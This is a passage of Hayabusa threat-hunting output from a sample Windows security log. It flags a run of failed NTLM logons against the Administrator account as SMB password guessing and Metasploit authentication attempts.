Password,User: Administrator : Type: 3 : Workstation: SAxij8QYLxxriIvu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.092 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.134 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HK2tbzICSpTrglud : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.134 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.176 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4rHJ70VrEwCQjSvL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.176 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.225 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8qwZT66ExkdJDZaT : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.225 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.260 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ezuHluj1fEC9KdQ1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.260 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bXH5uDfo4WB6QEnQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.300 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.336 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yWvZjuZhnGcrelOM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.336 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.434 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vb6ePjmpA8ZwK1PW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.434 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.473 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7e1A9ZY20WM8oDn6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.473 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.523 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 71GKLnXqSEEuc1Fw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.523 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.556 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: w0GsW0vDEkpRa1X0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.556 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0HH6zUUoL0qlfFC2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.600 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.636 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AG4pYsjob1iwlOc0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.636 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.677 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dNCX5tZ0nF1foTLW : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.677 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.710 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vO82Kb0kboVFuJy6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.710 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DptE2C8ZK3AxCb43 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.793 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.871 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NC8manvVP5pU8F3N : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.871 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.926 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: m00bI5welsLUWmwJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.926 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4shyxJk2PiH1TDlj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.976 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.014 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xZyN2WO3UVY0WQs6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.014 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.053 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: oSQjAMckifap5r1k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.053 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qixqXiX0mVcuXe37 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.096 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.126 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gIfJCJz6l36WMeY9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.126 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.166 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SZxv5U7uoN6E8c8E : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.166 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.209 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mlIfE0N32OQeWuNw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.209 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nkZcjpTmHcJ0uX38 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.256 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.301 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GZfaHr2Yq6xkRjOI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.301 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.336 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jvy0EIiPSnom7pn3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.336 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.380 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TN9PUb0BgI3u8Xax : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.380 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.429 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xCgz5BNpQgLgW0Xi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.429 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.478 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: po2GBdrXr3XtBsWR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.478 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O2rgo6jHcqu10IGY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.524 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.573 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MLblUOGzYzVA47E9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.573 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.616 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ysuA1xpYuAGRNONJ : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.616 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.660 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ksedziaGzXk5VNlS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.660 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.711 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: irIfGLQdhtRRGwuo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.711 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YCf6WUjiS11hHqKT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.752 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1o0CTT7GsWfCWuHx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.796 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.832 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: F6Jr8XrUsmTiSdol : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.832 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.868 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Buj66iuSkLEQdKnQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.868 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.912 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: L1wOLI51HqfkgO6r : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.912 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.945 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: X4oe273WXOICzkwW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.945 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.992 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1c7nGezYNJ70jR6R : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.992 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.037 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ajuZ09zGeuovCQLg : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.037 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.081 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: z4k7xV7soNF4mHlz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.081 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CtdqW8zOw1GoQcvA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.116 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aY6FLi1edRZWrRZN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.164 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
